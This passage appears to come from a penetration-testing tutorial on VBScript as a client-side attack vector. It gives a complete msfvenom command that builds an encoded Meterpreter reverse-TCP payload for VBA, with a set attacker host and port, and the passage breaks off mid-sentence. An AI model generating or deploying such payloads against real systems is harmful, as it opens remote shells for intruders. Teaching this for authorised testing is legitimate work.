Visual Basic Scripting (VBScript) is an active scripting language developed by Microsoft. It was designed to be a lightweight, Windows-native language that could execute small programs. VBScript has been installed by default on every desktop release of Microsoft Windows since Windows 98, making it an excellent target for client-side attacks.
To launch an attack using VBScript, we'll use msfvenom from the command line:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.124 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe
Note that f designates that the output will be a file that is VBA executable. The output will appear as a text file with two specific parts, as shown in the ...